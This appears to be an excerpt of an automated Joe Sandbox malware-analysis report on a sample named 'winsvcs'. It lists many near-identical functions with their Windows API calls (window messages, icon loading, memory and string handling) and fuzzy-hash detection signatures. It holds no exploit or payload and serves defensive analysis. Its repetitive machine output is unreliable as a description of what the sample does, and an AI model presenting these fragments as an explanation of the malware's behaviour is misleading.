Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
Instruction ID: c34b6a3563cd7af2964a3b0a4b55fe3fcf32e415c952ee7c54061f4af326a4b5
Opcode Fuzzy Hash: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
Instruction Fuzzy Hash: D1E042B1289714BAF65117B05C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D

Function 0040F5DE Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5E8
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5F8
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F600
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F60C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F61B

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
Instruction ID: 429cbd9149b55361b38364805ecf70f412a373ee621004217eed38f5c464dd76
Opcode Fuzzy Hash: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
Instruction Fuzzy Hash: 5BE042B1289614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7D

Function 0040F9FD Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA07
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA17
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA1F
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA2B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA3A

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
Instruction ID: c72f6ad03f353f561a99e758367ef941d0c916186b8f8285fa4e34984247ba56
Opcode Fuzzy Hash: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
Instruction Fuzzy Hash: 31E042B1289614BAF65117B05C4EFFA362DAB14B02F106520F792E91D0CAF86C428B7D

Function 0040F596 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5A0
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5B0
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F5B8
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F5C4
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F5D3

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
Instruction ID: b6dd8b5b4e134736a0db0f6dc2b81ca2b1be5616f72a07522d348ec5361ba80b
Opcode Fuzzy Hash: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
Instruction Fuzzy Hash: 0DE042B1289614BAF65117B05C4EFFA362DAB14B02F106421F792E95D0CAF86C428B7D

Function 0040F9B5 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F9BF
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F9CF
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F9D7
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F9E3
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9F2

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
Instruction ID: d34a4e6785fcd5d8804060be10e08f5a13504dab63f5c32d185528fae42e6cbc
Opcode Fuzzy Hash: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
Instruction Fuzzy Hash: C5E042B1689614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF86C428B7D

Function 0040FA45 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA4F
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA5F
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA67
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA73
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA82

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
Instruction ID: b7b077b0efbaa99d57c9e01e78f00ef8fa4a74ec0cbc48e40112d5a6e4ee9a6e
Opcode Fuzzy Hash: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
Instruction Fuzzy Hash: 47E04CB12883047AF65017B05C4EFB6352DA714B01F106820B792E91D1CAF85C42473D

Function 0040F27B Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000172), ref: 0040F288
SendMessageA.USER32(C033FFFF,00000080,00000001,00000000), ref: 0040F298
GetModuleHandleA.KERNEL32(00000000,?,00000172), ref: 0040F2A0
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2AC
SendMessageA.USER32(C033FFFF,00000080,00000000,00000000), ref: 0040F2BB

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
Instruction ID: d99028b12e30fd3fe39ac89642547f447b9f6d686350d1e6dd1f500a3f642d4a
Opcode Fuzzy Hash: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
Instruction Fuzzy Hash: D6E0ECB12887107BF65017A05C4EFEA352CAB14B01F105120F792AA1D0CAF85C42477D

Function 0040F2C6 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F2D0
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F2E0
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F2E8
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2F4
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F303

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
Instruction ID: 6d76136d54f134a665c01184275cec0f141023eb7b6fb85ea418c97ed7197620
Opcode Fuzzy Hash: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
Instruction Fuzzy Hash: DCE04CB12883047BF65017B05C4EFB6362DA714B01F106420B792E91D1CAF85C42473D

Function 0040FAD5 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FADF
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAEF
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAF7
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB03
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB12

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
Instruction ID: b992e7cc074c589086062039aad7a199eea489cb61b4551384fa19084778ec30
Opcode Fuzzy Hash: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
Instruction Fuzzy Hash: EEE04C712896147AF65117B05C4EFFA352DAB14B02F105520F796E91D0CAF85D42477D

Function 0040F6D9 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F6E3
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6F3
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6FB
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F707
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F716

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
Instruction ID: 3e28eb3131572d2fac298909779aa96aa2a87ebeacc2675cd42585d1acf75fde
Opcode Fuzzy Hash: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
Instruction Fuzzy Hash: CEE04C716896147AF65117B05C4EFFA352DAB14B01F109420F792E91D0DAF86C42477D

Function 0040FA8D Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA97
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAA7
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAAF
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FABB
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FACA

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
Instruction ID: 1d36f7c1484a4d98f76bcf46e8ebade4d22d25235dcfb774b2c89be6bd50a90d
Opcode Fuzzy Hash: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
Instruction Fuzzy Hash: D3E0EC712886007AF65017B05C0EFFA352CAB14B02F105420F792E90D0CAF85C42473D

Function 0040F691 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F69B
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6AB
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6B3
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F6BF
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F6CE

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
Instruction ID: c4bcc1e1c1be38c76109329eba7caa4c6fa0630b5fa9804ec52db424150adb96
Opcode Fuzzy Hash: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
Instruction Fuzzy Hash: 36E042B1289614BAF65117B05C4EFFA362DAB14B02F10A420F792E91D0CAF86C468B7D

Function 0040F356 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F360
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F370
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F378
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F384
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F393

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
Instruction ID: f7383a7ab23df242e51286724413437d4e223c1a3943708dcd5a078a45c667a9
Opcode Fuzzy Hash: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
Instruction Fuzzy Hash: 64E042B1288304BAF65117B06C4EFBA362DA714F02F106524F792E91D0CAF96C529B3E

Function 0040FB65 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB6F
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB7F
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB87
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB93
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FBA2

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
Instruction ID: 4017f48e94712bf2f969ea7e51899ef551f7e2015cd638675003ecdf66d8c9fa
Opcode Fuzzy Hash: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
Instruction Fuzzy Hash: 4BE04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85C42477D

Function 0040F769 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F773
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F783
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F78B
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F797
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7A6

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
Instruction ID: 71a0b32a7878cc80f8160acc97d736f4d43d5bc296ae39aaeaecc328a0f48766
Opcode Fuzzy Hash: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
Instruction Fuzzy Hash: 51E04C716897147AF65117B05C4EFFA352DAB14B01F105520F792E91D0CAF86C42477D

Function 0040F30E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F318
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F328
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F330
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F33C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F34B

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
Instruction ID: 334fcfc35a5dd8afaa864d8e0f73d07486cccace6e0d136221b9713eec3d01bf
Opcode Fuzzy Hash: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
Instruction Fuzzy Hash: EBE042B1289714BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7E

Function 0040FB1D Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB27
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB37
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB3F
LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB4B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB5A

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
Instruction ID: 0b98619118816d2a2a2b8005e09654c782942d7a3eccd87f9c26c283519b54bc
Opcode Fuzzy Hash: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
Instruction Fuzzy Hash: 4DE04C712896147AF65117B05C4EFFA352DAB14B02F105420F792E91D0CAF95D424B7D

Function 0040F721 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F72B
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F73B
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F743
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F74F
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F75E

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
Instruction ID: b83773e1df3edd97bc25a0b786c3283d31d19127a53598c0ef36f1eb61ead98d
Opcode Fuzzy Hash: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
Instruction Fuzzy Hash: 37E04C716896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D

Function 0040F3E6 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3F0
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F400
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F408
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F414
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F423

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
Instruction ID: 2b10cc25e026ddcf9697d52d97dd030663e87e79539ddb17dd0f1381a82fdc3c
Opcode Fuzzy Hash: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
Instruction Fuzzy Hash: C3E04CB1288304BAF65017B05C4EFB6352DA714B01F106520B792E91D1CAF85C42477D

Function 0040F7F9 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F803
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F813
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F81B
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F827
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F836

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
Instruction ID: 262968f47342c6bcf14978d3074c3fef03dfaca683abf3537834e770978e0ce4
Opcode Fuzzy Hash: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
Instruction Fuzzy Hash: 87E042B1299614BAF65117B09C4EFFA362DEB14B02F106420F792E91D0CAF86D428B7D

Function 0040F39E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3A8
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F3B8
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F3C0
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F3CC
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F3DB

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
Instruction ID: 510ba6cb99a25d9121a1dffcbb3beb8f5a9f0f327987106bb48a6d04e3a7d157
Opcode Fuzzy Hash: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
Instruction Fuzzy Hash: 80E04C712897147EF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D

Function 0040F7B1 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F7BB
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F7CB
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F7D3
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F7DF
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7EE

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
Instruction ID: fc2c61729b590515bdfd3972ace7de4b77c4262dfd1b686aa39bd5981164a283
Opcode Fuzzy Hash: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
Instruction Fuzzy Hash: 40E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D

Function 004335AA Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004335DE
__isleadbyte_l.LIBCMT ref: 00433612
MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000000,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 00433643
MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000001,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 004336B1

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
Instruction ID: 311c7ba4c8e43137f5e4a7efccb9debf39a4ffc4a742db9a7ca4f6796694eb12
Opcode Fuzzy Hash: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
Instruction Fuzzy Hash: 3631C031604246FFDB20DF64C8869AB7BA0FF09312F1495AAE4618B291DB34DE40DB55

Function 004145F8 Relevance: 6.1, APIs: 4, Instructions: 92memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041FE50: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,00418EB0), ref: 0041FE6C

RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 004144FD
lstrlenW.KERNEL32(?,8007000E), ref: 004145A3
GlobalAlloc.KERNEL32(00000042,-0000000E), ref: 004145B0
GlobalFix.KERNEL32(00000000), ref: 004145D1
_memcpy_s.LIBCMT ref: 004145E2
GlobalUnWire.KERNEL32(?), ref: 00414615
GetWindowLongA.USER32(?,000000FC), ref: 004146A8
SetWindowLongA.USER32(?,000000FC,?), ref: 004146B6
DestroyWindow.USER32(?), ref: 004146ED

Memory Dump Source

Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd

Similarity

API ID: Window$Global$Long$AllocDestroyExceptionRaiseRedrawWire_memcpy_slstrlen
String ID:
API String ID: 445683731-0
Opcode ID: 712bff58e48d1d3e9ee6eae366ca218e909d329bee0dcfb226d7fb1febb92fb0
Instruction ID: de7e53ce0f83194f635cf1e79a54ce0f96a2c22e459a526417b3a054ee68208e
Opcode Fuzzy Hash: 712bff58e48d1d3e9ee6eae366ca218e909d329bee0dcfb226d7fb1febb92fb0
Instruction Fuzzy Hash: C931A131204206EFDB10CF24DC44BDB77A5AF94B18F14422AFD09A62A1DB78CC85DB5A

Function 00415099 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 004150E7
lstrlenW.KERNEL32(?), ref: 00415103
lstrlenW.KERNEL32(?), ref: 00415121
